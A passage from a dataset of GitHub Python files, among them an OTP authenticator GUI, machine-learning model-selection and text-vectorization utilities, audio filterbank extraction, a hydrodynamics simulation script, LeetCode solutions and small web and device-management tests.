print(f\"Error in configuration file: {exc}\")\n self.config_data = None\n self.otplist = None\n\n def getlabel(self,label):\n self.label = label\n self.tooltip = self.config_data[label]['name']\n\n def getgenerator(self):\n if self.encryption_method == \"sops\":\n gensel = f\"['otp']['{self.label}']['genstring']\"\n gen_decrypt = subprocess.run(f\"{self.sops_cmd} \\\"{gensel}\\\" {self.config_file}\",capture_output=True,shell=True,universal_newlines=True,check=True)\n self.genstring = gen_decrypt.stdout\n elif self.encryption_method == \"plain\":\n self.genstring = self.config_data[self.label]['genstring']\n\n def otpcode(self):\n totp = pyotp.TOTP(self.genstring)\n return totp.now()\n\n def progress(self):\n return ((30-time.time()%30)/30)\nclass MyWindow(Gtk.Window):\n\n def __init__(self,otp):\n self.otp = otp\n Gtk.Window.__init__(self, title=\"OTP\")\n \n self.clipboard = Gtk.Clipboard.get(Gdk.SELECTION_CLIPBOARD)\n\n vbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=6)\n self.add(vbox)\n \n self.OtpCode = Gtk.Button.new_with_label(otp.otpcode())\n self.OtpCode.set_tooltip_text(otp.tooltip)\n self.OtpCode.connect(\"clicked\", self.on_otp_clicked)\n vbox.pack_start(self.OtpCode, True, True, 0)\n\n self.ProgressBar = Gtk.ProgressBar(fraction=otp.progress())\n vbox.pack_start(self.ProgressBar, True, True, 0)\n\n self.timeout_id = GLib.timeout_add(1000, self.on_timeout)\n self.activity_mode = False\n \n self.OtpLabelStore = 
Gtk.ListStore(str)\n for key in otp.otplist:\n self.OtpLabelStore.append([key])\n\n self.OtpCombo = Gtk.ComboBox.new_with_model(self.OtpLabelStore)\n self.OtpCombo.set_active(otp.otplist.index(otp.label))\n self.OtpCombo.connect(\"changed\", self.on_otp_changed)\n renderer_text = Gtk.CellRendererText()\n self.OtpCombo.pack_start(renderer_text, True)\n self.OtpCombo.add_attribute(renderer_text, \"text\", 0)\n vbox.pack_start(self.OtpCombo, False, False, 0)\n \n def on_timeout(self):\n new_value = self.otp.progress()\n self.ProgressBar.set_fraction(new_value)\n self.OtpCode.set_label(self.otp.otpcode())\n self.OtpCode.set_tooltip_text(self.otp.tooltip)\n return True\n \n def on_otp_changed(self, combo):\n tree_iter = combo.get_active_iter()\n if tree_iter is not None:\n model = combo.get_model()\n SelectedLabel = model[tree_iter][0]\n self.otp.getlabel(SelectedLabel)\n self.otp.getgenerator()\n \n def on_otp_clicked(self,OtpCode):\n self.clipboard.set_text(self.OtpCode.get_label(), -1)\n\ndef main():\n otp_settings_init = OtpSettings()\n otp_settings = otp_settings_init.settings()\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\",\"--config-file\", help=\"Path to otp.yml configuration file\", type=str,default=otp_settings['config_file'])\n parser.add_argument(\"-e\",\"--encryption-method\", help=\"Encryption method to use.\",choices=[\"plain\", \"sops\"],default=otp_settings['encryption_method'])\n parser.add_argument(\"-i\",\"--interface\", help=\"Interface to use. Default: gtk\",choices=[\"gtk\", \"script\"], default=\"gtk\")\n parser.add_argument(\"-l\",\"--label\", help=\"Otp label to display on startup or script. Default to first label (sorted alphabetical) in configuration file.\", type=str)\n parser.add_argument(\"-v\",\"--version\", help=\"show version\",action=\"store_true\")\n\n args = parser.parse_args()\n if args.version:\n print(f\"{program_version}\")\n sys.exit(0)\n config_file = args.config_file\n encryption_method = args.encryption_method\n interface = args.interface\n otplabel = args.label\n\n if encryption_method == \"sops\":\n try:\n subprocess.run(f\"sops -v\",capture_output=True,shell=True,universal_newlines=True,check=True)\n except subprocess.CalledProcessError as err:\n print(\"Cannot run sops executable. 
Is it in your PATH?\")\n print(f\"{err}\")\n sys.exit(1)\n otp = OtpStore(config_file=config_file,encryption_method=encryption_method)\n if otplabel is None:\n otp.getlabel(otp.otplist[0])\n else:\n try:\n otp.getlabel(otplabel)\n except KeyError as err:\n print(f\"Label not found\\nError: {err}\")\n sys.exit(1)\n otp.getgenerator()\n if interface == \"gtk\":\n win = MyWindow(otp)\n win.connect(\"destroy\", Gtk.main_quit)\n win.show_all()\n Gtk.main()\n elif interface == \"script\":\n print(\"OTP_LABEL={otplabel}\\nOTP_CODE={otpcode}\".format(otplabel=otp.label,otpcode=otp.otpcode()))\n\nif __name__ == '__main__':\n main()\n","repo_name":"gianluca-mascolo/otpgui","sub_path":"otpgui.py","file_name":"otpgui.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"}{"seq_id":"17599956495","text":"# model selector class to choose models\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport math as math\nimport scikitplot as skplt\n\nfrom sklearn.model_selection import cross_val_score, cross_validate\nfrom sklearn.metrics import classification_report\nfrom sklearn.ensemble import AdaBoostClassifier, RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neural_network import MLPClassifier\nfrom xgboost import XGBClassifier\n\nfrom imblearn.pipeline import Pipeline\nfrom sklearn.utils.class_weight import compute_class_weight\n\nseed = 7\n\nclass ModelSelector():\n\n def __init__(self, preprocessor,cv_state =True, sampler=None, instance_name=None):\n # initialise class with predetermined models and tests, maybe add functions to add/change them afterwards?\n # add option to use a sampler (default=None)\n self.results = []\n self.name = []\n self.preprocessor = preprocessor\n self.sampler = sampler\n self.cv = []\n self.labels = []\n self.cv_state = cv_state\n self.scoring = {'precision':'precision',\n 'recall': 'recall',\n 'f1score':'f1',\n 'roc auc':'roc_auc'}\n self.models = [\n ('LR', LogisticRegression(random_state=seed, max_iter = 1000, n_jobs=-1)),\n ('KNN', KNeighborsClassifier(n_jobs = -1)),\n ('RF', RandomForestClassifier(random_state=seed, n_jobs = -1)),\n ('ADAB', AdaBoostClassifier(random_state=seed)),\n ('XGB', XGBClassifier(random_state=seed, n_jobs = -1)),\n ('SVC', SVC(random_state=seed)),\n ('GNB', GaussianNB()),\n ('MLP', MLPClassifier(random_state=seed))\n ]\n self.instance_name = instance_name\n self.tests = [\"test_\"+elm for elm in self.scoring.keys()]\n self.best_results= []\n\n\n # function for determining the cvs, if True do cv for each ref_num\n def __cv__(self, X):\n if self.cv_state == True:\n self.labels = X.ref_number.values\n self.cv = [(np.where(self.labels != label)[0], np.where(self.labels == label)[0]) for label in np.unique(self.labels)]\n else:\n self.cv = 5\n\n\n # fit each model and do cv and record cvs and names\n def select_model(self, X, y, state):\n self.cv_state = state\n self.__cv__(X)\n for name, model in self.models:\n model_pipe = Pipeline([(self.preprocessor.__class__.__name__,self.preprocessor),\n (self.sampler.__class__.__name__,self.sampler),(\"name\",model)])\n cv_results = cross_validate(model_pipe, X, y, cv=self.cv, scoring=self.scoring, n_jobs=-1, return_train_score=True)\n self.results.append(cv_results)\n self.name.append(name)\n\n def 
plot_selection(self):\n # plot the test scores for each test and each model\n plt.figure(figsize = (15,8))\n plt.suptitle('Algorithm Comparison for ' + self.instance_name)\n for idx, test in enumerate(self.tests):\n temp_results = [self.results[i][test] for i in range(len(self.results))]\n plt.subplot(1,len(self.tests),idx+1)\n sns.boxplot(y = temp_results, x = self.name)\n plt.title(test)\n plt.xticks(rotation = 90)\n plt.ylim(0,1.05)\n plt.tight_layout()\n plt.subplots_adjust(top=0.85)\n\n def get_scores(self, top = 3):\n # get test scores for the top n tests for each measure and return them as a dataframe\n for idx, test in enumerate(self.tests):\n temp_results = [np.mean(self.results[i][test]) for i in range(len(self.results))]\n test_name = [test for i in range(len(self.name))]\n instance_name = [self.instance_name for i in range (len(self.name))]\n temp_best = sorted(zip(temp_results,self.name,test_name, instance_name), reverse = True)[:top]\n self.best_results.append(temp_best)\n\n test= pd.DataFrame()\n for i in range(np.array(self.best_results).shape[0]):\n test= pd.concat([test, pd.DataFrame(np.array(self.best_results)[i])], axis=0)\n test.columns = [\"test_result\",\"model\",\"test\", \"instance_name\"]\n test.test_result = test.test_result.astype(float)\n test.set_index([\"instance_name\",\"test\",\"model\"], inplace = True)\n return(test)\n\n\ndef modified_ratio(X, y, threshold = 0):\n # for every position in the predictions calculate a ratio of how many positions were modified\n # print out those over threshold and return them as a dataframe\n modified_pos = []\n modified_pos_ratio = []\n y_pred_ref_pos = X.ref_pos.values\n ratio_df = pd.DataFrame(pd.concat([pd.Series(y),pd.Series(y_pred_ref_pos)],axis=1))\n ratio_df.columns =[\"predicted\",\"ref_pos\"]\n for elm in ratio_df.ref_pos.unique():\n msk = ratio_df[ratio_df.ref_pos == elm]\n ratio = round((len(msk[msk.predicted == 1])/len(msk))*100,2)\n if ratio > threshold:\n print(\"Ratio of modified Reads for ref_pos \" + str(elm) + \" is: \" + str(ratio))\n modified_pos.append(elm)\n modified_pos_ratio.append(ratio)\n df = pd.DataFrame({\"ratio\":modified_pos_ratio}, index = modified_pos )\n df.index.rename(\"ref_pos\",inplace=True)\n return (df)\n\n\ndef feature_importances (model, preprocessor, X, y, debug = False, custom_feature_state = False, custom_feature_list=None):\n # plot feature importances with predefined model and preprocessor, get feature names either from input dataframe\n # if all are used or define a custom one if subset is used\n if custom_feature_state:\n feature_names = custom_feature_list\n else:\n cat_features = list(X.columns[X.dtypes == \"category\"])\n numeric_features = list(X.columns[X.dtypes == \"float\"])\n cat = None\n if \"base_1\" in X.columns:\n bases = [\"_A\",\"_C\",\"_T\",\"_G\"]\n cat = [elm + base for elm in cat_features for base in bases ]\n feature_names = numeric_features + cat\n\n X_trans = preprocessor.fit_transform(X)\n\n if debug:\n print(feature_names)\n print(len(feature_names))\n model.fit(X_trans, y)\n\n skplt.estimators.plot_feature_importances(model, feature_names=feature_names, max_num_features=10)\n plt.xticks(rotation=90);\n\n\n\ndef evaluation (model,X, y, thresh = 30):\n # for model produce confusion matrix, classification report and modified ratio\n y_pred=model.predict(X)\n skplt.metrics.plot_confusion_matrix(y, y_pred, figsize=(10,10), text_fontsize=20)\n print(\"-\"*30)\n print(classification_report(y,y_pred))\n print(\"-\"*30)\n ratio = modified_ratio(X,y_pred, thresh)\n 
print(\"-\"*30)\n return ratio\n\n\ndef yeast_prediction(preprocessor, X, y, yeast_df, model, model_name):\n # use test data to fit the given model and predict the yeast data; bar graph of the wt/ko ratio in the predicted\n # states, to see if either condition has more modified reads than the other\n X_trans = preprocessor.fit_transform(X)\n X_yeast_trans = preprocessor.fit_transform(yeast_df)\n model.fit(X_trans, y)\n y_yeast_pred = model.predict(X_yeast_trans)\n temp_df = pd.DataFrame(yeast_df[\"file_type\"])\n temp_df[\"modified_status\"] = y_yeast_pred\n yeast_group = temp_df.file_type.groupby(temp_df[\"modified_status\"]\n ).value_counts(normalize=True).rename(\"wt_ko_ratio\").reset_index()\n\n sns.barplot(data = yeast_group, x = \"modified_status\",y = \"wt_ko_ratio\", hue = \"file_type\"\n ,edgecolor=\"grey\" , linewidth = 2.5 );\n yeast_group.sort_values([\"modified_status\",\"file_type\"],inplace=True)\n yeast_group.set_index([\"modified_status\",\"file_type\"], inplace=True)\n yeast_group = pd.concat([yeast_group], keys=[model_name], names=['Model'])\n return yeast_group\n
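\n# Example usage:\n# selector = ModelSelector(preprocessor, sampler=sampler, instance_name=\"run_1\")\n# selector.select_model(X, y, state=True)\n# selector.plot_selection()\n# scores = selector.get_scores(top=3)\n","repo_name":"Karsten-Yan/ky-nf-capstone","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}{"seq_id":"74535121529","text":"import numpy as np\nimport pandas as pd\nimport pickle\nimport spacy\nimport tensorflow as tf\nimport tensorflow.compat.v1 as tf1\nimport tensorflow_hub as hub\nimport time\n\n\nfrom data_handler import Data_Handler\n\n\nnlp = spacy.load('en', disable=['parser', 'ner'])\n\nelmo = hub.load(\"https://tfhub.dev/google/elmo/3\")\n\ndef lemmatization(texts):\n '''\n Takes in text to be vectorized and lemmatizes it for the next steps.\n '''\n\n output = []\n for i in texts:\n s = [token.lemma_ for token in nlp(i)]\n output.append(' '.join(s))\n return output\n\ndef elmo_data_prep():\n '''\n Takes in data to be vectorized and goes through a cleaning and\n lemmatization process so it plays nicely with ELMo.\n '''\n\n start = time.time()\n print(time.asctime(time.localtime(start)))\n wrangler = Data_Handler('data/cleaned_data.csv')\n df = wrangler.get_top_num(15)\n stops = wrangler.stop_words\n \n X = df['description']\n y = df['variety']\n \n # Scrubbing methods\n punctuation = ',.!\"#$%&()*+-/:;<=>?@[\\\\]^_`{|}~'\n df['description'] = df['description'].apply(lambda x: ''.join(ch for ch in str(x) if ch not in set(punctuation)))\n df['description'] = df['description'].str.lower()\n df['description'] = df['description'].str.replace(\"[0-9]\", \" \")\n df['description'] = df['description'].apply(lambda x:' '.join([word for word in x.split() if word not in stops]))\n df['description'] = lemmatization(df['description'])\n\n # Saves data to new .csv\n df.to_csv('data/elmo_prepped_data.csv')\n print(df.head())\n print(time.time() - start)\n\n\ndef elmo_vectors(x):\n '''\n Goes through prepped data and vectorizes it returning embeddings.\n '''\n \n cycle = time.time()\n embeddings = elmo.signatures['default'](tf.convert_to_tensor(x))[\"default\"]\n \n # sess = tf1.Session()\n # sess.run(tf1.global_variables_initializer())\n # sess.run(tf1.tables_initializer())\n # # return average of ELMo features\n # avg = sess.run(tf1.reduce_mean(embeddings,1))\n print(time.time() - cycle)\n return embeddings\n\nif __name__ == '__main__':\n start = time.time()\n print(time.asctime(time.localtime(start)))\n\n df = pd.read_csv('data/elmo_prepped_data.csv')\n chunks = [df[i:i+100] for i in 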
range(0, df.shape[0], 100)]\n elmo_vects = [elmo_vectors(x['description']) for x in chunks]\n elmo_final_vects = np.concatenate(elmo_vects, axis = 0)\n\n pickle_out = open('data/elmo_vectors.pkl','wb')\n pickle.dump(elmo_final_vects, pickle_out)\n pickle_out.close()\n print(time.time() - start)","repo_name":"IHetterich/wine-classifier","sub_path":"src/in_development/elmo_vectorization.py","file_name":"elmo_vectorization.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"20186959135","text":"from rest_framework import serializers\nfrom .models import Client, Photo\nfrom source.image_crop import crop\n\n\nclass PhotoSerializer(serializers.ModelSerializer):\n \"\"\" Serializer for photo model \"\"\"\n class Meta:\n model = Photo\n fields = '__all__'\n\nclass ClientSerializer(serializers.ModelSerializer):\n \"\"\" Serializer for Client model with OneToOne \"\"\"\n photo = PhotoSerializer()\n left = serializers.IntegerField(allow_null=True, write_only=True)\n top = serializers.IntegerField(allow_null=True, write_only=True)\n right = serializers.IntegerField(allow_null=True, write_only=True)\n bottom = serializers.IntegerField(allow_null=True, write_only=True)\n\n class Meta:\n model = Client\n fields = '__all__'\n\n def create(self, validated_data, *args, **kwargs):\n photo_data = validated_data.pop('photo')\n photo = Photo.objects.create(**photo_data)\n left = validated_data.pop('left')\n top = validated_data.pop('top')\n right = validated_data.pop('right')\n bottom = validated_data.pop('bottom')\n crop(str(photo.file), left, top, right, bottom)\n client = Client.objects.create(photo=photo, **validated_data)\n\n return client\n\n","repo_name":"injirez/redsoft","sub_path":"redsoft/clients/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13097412913","text":"import phd\nimport numpy as np\n\n# to run:\n# $ mpirun -n 4 python explosion_2d_random.py\n# for parallel or\n# $ python explosion_2d_random.py\n# for single core\n\ndef create_particles(dim=2, n=10000, gamma=1.4):\n\n # create particle container\n particles = phd.HydroParticleCreator(n, dim=2)\n\n c = 0.5\n for i in range(n):\n\n x = np.random.rand()\n y = np.random.rand()\n\n if (x-c)**2 + (y-c)**2 <= 0.25**2:\n particles[\"density\"][i] = 1.0\n particles[\"pressure\"][i] = 1.0\n else:\n particles[\"density\"][i] = 0.125\n particles[\"pressure\"][i] = 0.1\n\n particles[\"position-x\"][i] = x\n particles[\"position-y\"][i] = y\n particles[\"ids\"][i] = i\n\n # zero out velocities and set particle type\n particles[\"velocity-x\"][:] = 0.0\n particles[\"velocity-y\"][:] = 0.0\n\n return particles\n\ndim = 2; gamma = 5./3.\nparticles = phd.distribute_initial_particles(\n create_particles, dim=dim, gamma=gamma)\n\n# computation related to boundaries\ndomain_manager = phd.DomainManager(\n xmin=[0., 0.], xmax=[1., 1.],\n initial_radius=0.1)\n\n# create voronoi mesh\nmesh = phd.Mesh(relax_iterations=10)\n\n# computation\nintegrator = phd.MovingMeshMUSCLHancock()\nintegrator.set_mesh(mesh)\nintegrator.set_riemann(phd.HLLC())\nintegrator.set_particles(particles)\nintegrator.set_domain_manager(domain_manager)\nintegrator.set_boundary_condition(phd.Reflective())\nintegrator.set_reconstruction(phd.PieceWiseLinear())\nintegrator.set_equation_state(phd.IdealGas(gamma=gamma))\n\nsim_name = 
\"explosion\"\nif phd._in_parallel:\n integrator.set_load_balance(phd.LoadBalance())\n sim_name = \"explosion_mpi\"\n\n# add finish criteria\nsimulation_time_manager = phd.SimulationTimeManager()\nsimulation_time_manager.add_finish(phd.Time(time_max=0.1))\n\n# output last step\noutput = phd.FinalOutput()\noutput.set_writer(phd.Hdf5())\nsimulation_time_manager.add_output(output)\n\n# Create simulator\nsimulation = phd.Simulation(simulation_name=sim_name)\nsimulation.set_integrator(integrator)\nsimulation.set_simulation_time_manager(simulation_time_manager)\nsimulation.initialize()\nsimulation.solve()\n","repo_name":"rickyfernandez/phd-code","sub_path":"test_suite/explosion/explosion_2d_random.py","file_name":"explosion_2d_random.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"681255345","text":"import os, glob, sndhdr\nimport json\nimport base64\nimport numpy as np\nfrom scipy.io import wavfile, savemat\nfrom features import fbank, mfcc # python_speech_features\nimport fnmatch\nimport pdb\n\ndef melfilter(N, freq):\n melFreq = 2595*np.log10(1+freq/700)\n\n maxF = np.max(melFreq)\n minF = np.min(melFreq)\n melBinWidth = (maxF-minF)/(N+1)\n filt = np.zeros((N, len(freq)), dtype='float32')\n\n for n in range(0, N):\n idx = np.where( melFreq>=(n*melBinWidth+minF) & melFreq<=((n+2)*melBinWidth+minF) )\n binWidth = len(idx)\n\n filt[n, idx] = np.bartlett(binWidth)\n\n return filt\n\ndef wav2fbank(wavFile, fs=16000, maxLen_s=None):\n\n if isinstance(wavFile, str):\n (fs, wav) = wavfile.read(wavFile)\n assert fs == 16000 # requirement for now\n elif isinstance(wavFile, np.ndarray):\n wav = wavFile\n\n winlen = 0.025\n winstep = 0.015\n nfft = np.int(np.power(2, np.ceil(np.log2(winlen*fs))))\n winfunc = lambda x: np.hanning(x)\n nfilt = 40\n preemph = 0.97\n\n if np.ndim(wav) == 2: # Multiple channels; just take left one\n wav = wav[:,0]\n if maxLen_s is not None:\n maxSamp = maxLen_s * fs\n wav = wav[:maxSamp]\n\n if True:\n M, E = fbank(wav, fs, winlen=winlen, winstep=winstep, nfilt=nfilt, nfft=nfft, winfunc=winfunc, preemph=preemph)\n\n logM = np.log(M)\n else:\n logM = mfcc(wav, fs, numcep=16, winlen=winlen, winstep=winstep, nfilt=nfilt, nfft=nfft, winfunc=winfunc, preemph=preemph)\n logM = np.swapaxes(logM, 0, 1)\n\n return logM\n\ndef find_audio_files(wavDir, matcher=None):\n\n # Find all audio files in the directory\n allFiles = glob.glob(os.path.join(wavDir,'*.*'))\n audioFiles = []\n for f in allFiles:\n if matcher is not None and not fnmatch.fnmatch(f, matcher):\n continue\n chk = sndhdr.what(f)\n if chk is not None:\n audioFiles.append(f)\n\n return audioFiles\n\ndef wav2fbank_batch(wavDir, matcher=None):\n\n audioFiles = find_audio_files(wavDir, matcher)\n logM = []\n for f in audioFiles:\n logM.append(wav2fbank(f))\n\n return logM, audioFiles\n\ndef find_bin_files(wavDir, matcher=None):\n\n # Find all bin files in the directory\n allFiles = glob.glob(os.path.join(wavDir,'*.bin'))\n binFiles = []\n for f in allFiles:\n if matcher is not None and not fnmatch.fnmatch(f, matcher):\n continue\n binFiles.append(f)\n\n return binFiles\n\ndef load_bin(fname, nfilt=40):\n\n f = open(fname,'r')\n x = np.fromfile(f,dtype=np.int16)\n f.close()\n\n x = x.reshape(x.shape[0] / nfilt, nfilt)\n x = np.swapaxes(x, 0, 1)\n\n return x\n\ndef append_padded(logM, data, targetSize=None):\n\n if targetSize is not None:\n if data.shape[1] < targetSize:\n data = np.concatenate((data, 
def append_padded(logM, data, targetSize=None):\n\n if targetSize is not None:\n if data.shape[1] < targetSize:\n data = np.concatenate((data, np.zeros((data.shape[0], targetSize-data.shape[1]))), axis=1)\n elif data.shape[1] > targetSize:\n data = data[:, :targetSize] # keep exactly targetSize frames (equivalent to the old negative-slice trick)\n\n logM.append(data)\n\n return logM\n\ndef bin2fbank_batch(dirName, matcher=None, targetSize=None):\n\n files = find_bin_files(dirName, matcher)\n logM = []\n for f in files:\n data = load_bin(f)\n logM = append_padded(logM, data, targetSize=targetSize)\n\n return logM, files\n\ndef bin2mat(inFile, outFile=None):\n\n if outFile is None:\n outFile = inFile.replace('.bin','.mat')\n\n features = load_bin(inFile)\n savemat(outFile, {'features': features})\n\ndef bin2mat_all(dirName):\n\n files = find_bin_files(dirName)\n for f in files:\n bin2mat(f)\n\ndef bin2mat_batch(dirName, outFile, matcher=None, targetSize=None):\n\n logM, files = bin2fbank_batch(dirName, matcher=matcher, targetSize=targetSize)\n logM = np.array(logM)\n savemat(outFile, {'logM':logM, 'files':files})\n\ndef load_serverfeats(fname):\n\n f = open(fname, 'r')\n\n s = f.read()\n f.close()\n datas = s.split(\"}\")\n\n feats = []\n for data in datas:\n if len(data) <= 2:\n continue\n\n tmp = data + \"}\"\n jdata = json.loads(tmp)\n\n if '+okay' not in jdata['id']:\n continue\n\n n = jdata['num_cols']\n bindata = base64.b64decode(jdata['payload'])\n x = np.frombuffer(bindata,dtype=np.int8) # np.fromstring is deprecated for binary data\n istart = x.shape[0] % n\n x2 = x[istart:].reshape((x.shape[0] // n, n)) # drop the remainder, then integer-divide for the row count\n feats.append(x2)\n\n feats = np.array(feats)\n return feats\n\ndef serverfeats2mat(inFile, outFile, targetSize=None):\n\n feats = load_serverfeats(inFile)\n logM = []\n for data in feats:\n logM = append_padded(logM, data.swapaxes(0, 1), targetSize=targetSize)\n\n logM = np.array(logM)\n savemat(outFile, {'logM':logM})\n\n","repo_name":"hello/onsei","sub_path":"dataprep/audioproc.py","file_name":"audioproc.py","file_ext":"py","file_size_in_byte":4671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40251959608","text":"'''\nhttps://leetcode-cn.com/problems/factorial-trailing-zeroes\n\nGiven an integer n, return the number of trailing zeroes in n!.\nExample 1:\nInput: 3\nOutput: 0\nExplanation: 3! = 6, which has no trailing zero.\nExample 2:\nInput: 5\nOutput: 1\nExplanation: 5! 
= 120, which has one trailing zero.\nNote: your algorithm's time complexity should be O(log n).\n'''\n\nclass Solution:\n def trailingZeroes(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n # count factors of 5 in n!; factors of 2 always outnumber them\n count = 0\n while n:\n n //= 5\n count += n\n return count\n\n\nif __name__ == '__main__':\n s = Solution()\n ret = s.trailingZeroes(5)\n print(ret)\n","repo_name":"chanfengsr/AllPrivateProject","sub_path":"Python/LeetCodeTraining/题库/0172 阶乘后的零(Factorial Trailing Zeroes).py","file_name":"0172 阶乘后的零(Factorial Trailing Zeroes).py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"70235024569","text":"class Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n if needle == \"\":\n return 0\n for i in range(len(haystack)):\n if haystack[i:i+len(needle)] == needle:\n return i\n return -1\n\n\nif __name__ == '__main__':\n Sol = Solution()\n res = Sol.strStr(haystack=\"aaaaa\", needle=\"bba\")\n print(res)","repo_name":"codershenghai/PyLeetcode","sub_path":"easy/0028.implement-strStr().py","file_name":"0028.implement-strStr().py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38186440353","text":"import pytest\nimport os\nfrom flask import Response\nfrom tests.client import MDMClient\nfrom commandment.mdm import CommandStatus\nfrom commandment.models import Command, Device\n\nTEST_DIR = os.path.realpath(os.path.dirname(__file__))\n\n\n@pytest.fixture()\ndef installed_application_list_response():\n with open(os.path.join(TEST_DIR, '../../testdata/InstalledApplicationList/10.11.x.xml'), 'r') as fd:\n plist_data = fd.read()\n\n return plist_data\n\n\n@pytest.fixture(scope='function')\ndef installed_application_list_command(session):\n c = Command(\n uuid='00000000-1111-2222-3333-444455556666',\n request_type='InstalledApplicationList',\n status=CommandStatus.Sent.value,\n parameters={},\n )\n session.add(c)\n session.commit()\n\n\n@pytest.mark.usefixtures(\"device\", \"installed_application_list_command\")\nclass TestInstalledApplicationList:\n\n def test_installed_application_list_response(self, client: MDMClient, installed_application_list_response: str, session):\n response: Response = client.put('/mdm', data=installed_application_list_response, content_type='text/xml')\n assert response.status_code != 410\n assert response.status_code == 200\n\n d: Device = session.query(Device).filter(Device.udid == '00000000-1111-2222-3333-444455556666').one()\n ia = d.installed_applications\n assert len(ia) == 3\n","repo_name":"cmdmnt/commandment","sub_path":"tests/mdm/test_installed_application_list.py","file_name":"test_installed_application_list.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":277,"dataset":"github-code","pt":"77"}
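# --- Editor's aside (hedged sketch): the trailingZeroes body filled in above uses
# Legendre's formula -- zeros of n! = floor(n/5) + floor(n/25) + ... because factors
# of 2 always outnumber factors of 5. A brute-force cross-check:
import math

def brute_force(n):
    s = str(math.factorial(n))
    return len(s) - len(s.rstrip('0'))

def formula(n):
    count = 0
    while n:
        n //= 5
        count += n
    return count

assert all(brute_force(n) == formula(n) for n in range(200))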
+{"seq_id":"35317157344","text":"\nfrom Qt.CanQt import CanWindow\nfrom Qt.Trace32Qt import Trace32Window\n\nfrom templates import *\nfrom Lib.Inst.Trace32Lib import *\nfrom Lib.Inst.canLib import *\nfrom Lib.Inst.visaLib import *\n\n\nclass InstWindow(QWidget):\n def __init__(self):\n QWidget.__init__(self)\n\n # SET AS IMAGE WIDGETS\n self.ui_inst = Ui_inst()\n self.ui_inst.setupUi(self)\n\n # Declare the child QWidgets\n self.canWidget = CanWindow()\n self.t32Widget = Trace32Window()\n\n self.ui_inst.stackedWidget.addWidget(self.canWidget)\n self.ui_inst.stackedWidget.addWidget(self.t32Widget)\n self.ui_inst.stackedWidget.setCurrentWidget(self.canWidget)\n\n self.connectBtnInit()\n\n self.df_inst = None\n self.update_tbl_from_df()\n\n def connectBtnInit(self):\n self.ui_inst.btn_TRACE32.clicked.connect(self.func_btn_TRACE32)\n self.ui_inst.btn_CAN.clicked.connect(self.func_btn_CAN)\n self.ui_inst.btn_Visa.clicked.connect(self.func_btn_Visa)\n self.ui_inst.btn_Refresh.clicked.connect(self.update_tbl_from_df)\n\n def func_btn_TRACE32(self):\n self.ui_inst.stackedWidget.setCurrentWidget(self.t32Widget)\n\n def func_btn_CAN(self):\n self.ui_inst.stackedWidget.setCurrentWidget(self.canWidget)\n\n def func_btn_Visa(self):\n self.ui_inst.stackedWidget.setCurrentWidget(self.ui_inst.new_page)\n\n def update_tbl_from_df(self):\n # Write the values into the table widget\n self.ui_inst.tbl_inst_status.clear()\n # Select Dataframe\n self.df_inst = self._get_inst_status()\n logging_print(\"Current Test Environment\\n{}\\n\".format(self.df_inst))\n # Table Contents\n self.ui_inst.tbl_inst_status.setColumnCount(len(self.df_inst.columns))\n self.ui_inst.tbl_inst_status.setHorizontalHeaderLabels(self.df_inst.columns.tolist())\n self.ui_inst.tbl_inst_status.setRowCount(len(self.df_inst.index))\n\n for r in range(len(self.df_inst.index)):\n for c in range(len(self.df_inst.columns)):\n self.ui_inst.tbl_inst_status.setItem(r, c, QTableWidgetItem(str(self.df_inst.iloc[r][c])))\n self.ui_inst.tbl_inst_status.resizeColumnsToContents()\n\n def _get_inst_status(self):\n lst_inst_data = []\n lst_inst = [i for i in Configure.set.sections() if 'system' not in i and 'XCP' not in i]\n for inst in lst_inst:\n if Configure.set[inst]['type'] == 'T32':\n lst_inst_data.append([inst, t32.status])\n elif Configure.set[inst]['type'] == 'can':\n lst_inst_data.append([inst, canBus.devs[inst].status != CAN_ERR])\n else:\n lst_inst_data.append([inst, visa.status[inst]])\n return pd.DataFrame(lst_inst_data, columns=['Name', 'Connect'])\n\n","repo_name":"yongheelee87/DevEnv","sub_path":"SwVerification/Qt/InstQt.py","file_name":"InstQt.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9253828045","text":"from exif import Image as ExifImage\n\nfrom veems import images\n\n\ndef test_remove_exif_data(uploaded_img_with_exif):\n img_file_obj, _ = uploaded_img_with_exif\n\n result_file_obj = images.remove_exif_data(img_file_obj)\n\n # Check all exif data was removed\n exif_image = ExifImage(result_file_obj)\n assert exif_image.list_all() == []\n","repo_name":"VeemsHQ/veems","sub_path":"tests/test_images.py","file_name":"test_images.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"77"} +{"seq_id":"36270105983","text":"from django.http import JsonResponse\nfrom django.views import View\nfrom orders import tasks\nimport logging\nimport 